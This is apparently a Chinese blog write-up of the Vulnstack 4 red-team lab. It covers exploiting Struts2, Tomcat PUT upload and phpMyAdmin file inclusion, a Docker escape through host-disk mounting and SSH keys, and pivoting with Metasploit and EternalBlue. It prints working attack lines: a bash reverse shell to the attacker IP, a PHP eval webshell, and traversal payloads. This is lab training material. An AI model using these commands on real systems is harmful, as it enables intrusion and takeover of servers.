[渗透测试]Vulnstack 红队(四)

最新推荐文章于 2024-02-23 18:05:15 发布
最新推荐文章于 2024-02-23 18:05:15 发布
阅读量523 收藏 4
点赞数 4
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/123942395
版权

环境配置

网络拓扑图(仅供参考)

img

账号信息:

web: ubuntu:ubuntu
win7: douser:Dotest123
DC: administrator:Test2008

ip信息:

攻击机
	IP:192.168.111.5 
	OS:Kali
靶机
Web
    IP1:192.168.111.14
    IP2:192.168.52.129
    OS:Ubuntu
DC
    IP:192.168.183.0/24
    OS:Windows Server 2008
PC
    IP:192.168.52.130
    OS:Windows 7

Web服务器为Ubuntu,漏洞被封装在docker里,需要手动开启

s2-045
cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
sudo docker-compose up -d
CVE-2017-12615(tomcat put上传)
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/
sudo docker-compose up -d
cve-2018-12613(phpmyadmin文件包含漏洞)
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/
sudo docker-compose up -d

image-20220402131237112

知识点:

1.st漏洞利用               2.phpmyadmin 4.8.1文件包含  
3.tomcat getshell         4.docker逃逸 ssh 免密登录   
5.ms14-068 域提权漏洞  	  6.bash 一句话反弹shell     
7.sc 服务计划任务           8.token 降权收集信息

外网渗透

nmap扫描

nmap 192.168.111.14 -A

得到

image-20220402131624549

得到对应端口服务

22:ssh
2001:struts2
2002:Tomcat (version:8.5.19)
2003:phpmyadmin(version:4.8.1)

2001:struts2漏洞利用

直接利用工具getshell

image-20220402233902524

2002:Tomcat漏洞利用

CVE-2017-12615

Tomcat PUT上传漏洞,当 Tomcat运行在Windows或linux操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
先抓包:

image-20220402235905062

修改方法为PUT,上传冰蝎马

image-20220403000241168

冰蝎连接

image-20220403000513706

CVE-2017-12617

检索版本漏洞

searchsploit tomcat 8.5.19

image-20220403001214921

将其复制到桌面

searchsploit -m /usr/share/exploitdb/exploits/jsp/webapps/42966.py

漏洞检测

python3 42966.py -u http://192.168.111.14:2002/

image-20220403001758129

发现存在漏洞,获取shell

python3 42966.py -u http://192.168.111.14:2002/ -p pwn

image-20220403002127220

2003:phpmyadmin漏洞利用

CVE-2018-12613

先任意文件读

index.php?target=db_sql.php?/../../../../../../../../etc/passwd

image-20220403002724244

每次登录phpmyadmin系统的时候,系统就会产生一个 sess_sessionID 文件,然后在里面执行的操作,会被记录到这个文件内(UNIX系统中存放路径为 /tmp/sess_[当前会话session值]

运行

select '<?php @eval($_GET["cmd"])?>' ;

之后利用

?target=db_sql.php%253f/../../../../../../../../tmp/sess_117093d081ee0d99edc67065a4df511c&cmd=phpinfo();

Docker逃逸

实战中我们需要判断服务器是否运行在docker中,常用的判断方法有两种:

是否存在.dockerenv文件:
docker环境下存在:ls -alh /.dockerenv 文件

查询系统进程的cgroup信息:
docker环境下 cat /proc/1/cgroup

image-20220403005843543

既然判断出是docker环境,我们就需要进行docker逃逸

特权模式—privileged+ssh 免密码 逃逸

特权模式于版本0.6时被引入Docker,允许容器内的root拥有外部物理机root权限,而此前容器内root用户仅拥有外部物理机普通用户权限。
使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。

挂载目录
fdisk -l	查看磁盘文件
mkdir /test	新建目录以备挂载
mount /dev/sda1 /test	将宿主机/dev/sda1 目录挂载至容器内 /test,即可写文件获取权限或数据

image-20220403094356337

查看一下是否挂载成功ls /test

image-20220403094515692

生成密钥

kali上生成密钥文件

ssh-keygen -f test

chmod 600 test  //对test赋权,只有拥有者有读写权限。

image-20220403095406225

写入密钥

image-20220403095905482

冰蝎shell不是很好操作,反弹一个shell

bash -i >& /dev/tcp/192.168.111.5/9999 0>&1

利用冰蝎上传shell.sh

chmod +x shell.sh   //添加可执行
bash shell.sh     //运行

image-20220403100931130

将 ssh秘钥 写入到.ssh目录里面并将文件命名为authorized_keys

cp -avx /test/home/ubuntu/.ssh/id_rsa.pub /test/home/ubuntu/.ssh/authorized_keys 
// -avx 将权限也一起复制

echo > authorized_keys  //将内容清空

echo 'kali生成的.pub内容' > authorized_keys  //将ssh秘钥写入

image-20220403102542570

SSH登录
ssh -i test ubuntu@192.168.111.14

成功逃逸

image-20220403102716551

内网渗透

MSF上线

use exploit/multi/script/web_delivery
set target 7   						# 选择目标系统
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.111.5
set lport 4444
exploit

image-20220403104210254

在目标机上运行链接获得meterpreter

image-20220403104325251

信息搜集

shell中ip a发现另一个网段

image-20220403110051975

添加路由

run autoroute -s 192.168.52.0/24
run autoroute -p

image-20220403110339938

内网扫描

注:由于我在设置为192.168.52.0/24网段时无法扫描到DC,于是将内网网段更改为192.168.183.0/24

使用ms17-010扫描一下网段

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.183.128-130
run

image-20220403144301861

发现两台主机:

192.168.183.128 WIN7
192.168.183.130	Windows Server 2008

永恒之蓝利用

setg Proxies socks5:192.168.111.14:1080
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.183.128
set lport 4444        
run

image-20220403153932089

网上师傅们都从这个点利用成功了,但我这里没有成功

敏感信息泄露

查看一下ubuntu的命令历史记录

cat .bash_history | grep 192.168.183.129

image-20220403154116505

这个地方泄露了win7的账号密码

我们挂一个socks5代理,利用wmiexec进行连接

proxychains python3 wmiexec.py 'demo.com/douser:Dotest123@192.168.183.132'

认证失败

总结

按照网上师傅的路线,后续是:

  • 内网信息搜集(降权),不是域用户没有权限执行域命令

通过token窃取实现降权或者提权

  • ms14-068进攻域控
  • 痕迹清理

这里我没有获取到WIN7的shell导致后续无法实现,但这个过程也学到了很多,之后再检查一下哪里出了问题吧。

参考文章:

http://www.yongsheng.site/2021/04/12/ATT&CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%EF%BC%88%E5%9B%9B%EF%BC%89/

https://blog.csdn.net/qq_36241198/article/details/121619400

https://www.erikten.cn/posts/5ac1195.html#searchModal

Snakin_ya
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
vulnstack4渗透-外网篇
weixin_51441054的博客
04-20 3091
环境搭建 靶机:ubuntu:ubuntu(web服务器 网卡1:192.168.142.139(模拟外网) 网卡2:192.168.183.130(内网)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外网) 先对web靶机进行信息收集 发现一个ssh服...
vulnstack1--红队靶机(域渗透)
tlovejr的博客
04-27 4064
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 二、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第二次开机时,原
Vulnstack
干铮的博客
05-24 1051
靶场拓扑 下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 用的是VMware workstation 所以可能出现一些错误 Docker环境启动的是Vulhub的在线三个靶机 1.信息收集 主机发现 sudo netdiscover -i eth1 -r 192.168.157.0/24 端口扫描 nmap -A 192.168.53.128 -p- -oN nmap.a 2.apacheput文件上传脚本..
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1607
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
红日七vulnstack7全操作
weixin_62334252的博客
06-22 7238
http://vulnstack.qiyuanxuetang.net/vuln/detail/9/整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。 域用户账户和密码如下: Administrator:Whoami2021 whoami:Whoami2021 bunny:Bunny2021 moretz:Moretz2021Ubuntu 1: web:web2021Ubuntu 2: ubuntu
红日安全ATT&CK靶机实战系列之vulnstack4
黑白的博客
04-25 8680
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
红日靶场五(vulnstack5)渗透分析
rysehsf的博客
10-25 156
上线cs,发现为heart用户,管理员权限,svc提权到system,抓取hash和明文,没有发现有用的域用户信息。这里配置的原因是让kali可以访问win7,win7访问不了kali,模拟win7外网的环境和kali内网的环境。将kali通过frp到vps端口,并生成免杀exe,蚁剑上传执行。这里dc不出网,fscan扫描到开启了445端口,直接smb上线。访问80页面发现一个thinkphp框架的首页,工具扫描RCE。开启socks代理,通过fscan扫描内网111网段。
渗透测试/红队/src全方位测试字典
09-01
这是安全测试人员的伴侣。它是安全评估期间使用的多种类型的列表的集合,收集在一个位置。列表类型包括用户名、密码、URL、敏感数据模式、模糊有效负载、Web 外壳等等。目标是使安全测试人员能够将此存储库拉到新的...
红队渗透打点工具-FindUpload
最新发布
03-07
FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络系统中的文件上传点与登录框,从而加速渗透测试流程,提高工作效率。 FindUpload的特性主要体现在以下几个方面: 1. **批量...
认证红队物理渗透测试领导者 - 快速培训.pdf
10-06
【认证红队物理渗透测试领导者 - 快速培训】是一个专注于网络安全领域中物理渗透测试的专业培训课程,由Joas Antonio创建并提供,他是红队领导者的成员,具有丰富的渗透测试经验。该培训基于2023年红队领导者项目...
红队综合渗透框架SatanSword
01-14
web指纹识别,集成whatweb及wappalyzer所有指纹及自己收集的web服务器指纹1839条+cms指纹1936条。 漏洞PoC检测,提供360+PoC检测脚本内置在数据库中,同时支持漏洞查询和代码查看及一键批量检测功能。...
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1760
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
红日靶机vulnstack04【半总结】
qq_45300786的博客
10-06 520
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
vulnstack4
m0_70782241的博客
02-23 1277
docker逃逸,域渗透
渗透靶场--vulnstack-红队评估实战(4)
weixin_45794666的博客
07-20 751
vulnstack-红队评估实战(4) 环境配置 web服务器 ubuntu:ubuntu 内网192.168.183.131 外网192.168.154.137 web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613 sudo su ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045 docker-compose up 域成员机器 douser:Dotest123 192.168.183.128 域控
靶场vulnstack4内网渗透
weixin_71169068的博客
11-18 1024
靶场vulnstack4内网渗透
CVE-2017-12617-Tomcat远程代码执行漏洞复现分析
qq_29365787的博客
06-09 3263
CVE-2017-12617-Tomcat远程代码执行漏洞复现分析 一、CVE-2017-12617介绍 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12617:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDA
CVE-2017-12617
龙卷风摧毁停车场
03-01 678
参数 readonly 设置 false 或使用参数 readonly 设置启用 WebDAV servlet false。此配置允许任何未经身份验证的用户上传文件。只要 JSP 可以上传,就可在服务器执行。一定条件下,可利用漏洞,获取服务器 JSP 文件源代码,或构造攻击请求,向服务器上传恶意 JSP 文件,通过上传 JSP 文件 ,可在服务器上执行任意代码,导致数据泄露或获取权限。
cve-2017-12617 tomcat远程代码执行漏洞复现测试
whatday的专栏
08-30 3542
0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12617:远程代码执行漏洞。 只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的)。发现并阻止上传Jav
"网络安全渗透测试红队行动概述
他们可能使用各种方式,包括社会工程学、渗透测试、应用程序漏洞利用等等。通过实施这些攻击,红队可以评估目标系统和网络的安全性,并发现其中的漏洞。 5.权限提升:一旦红队成功进入目标系统,他们会尝试提升权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值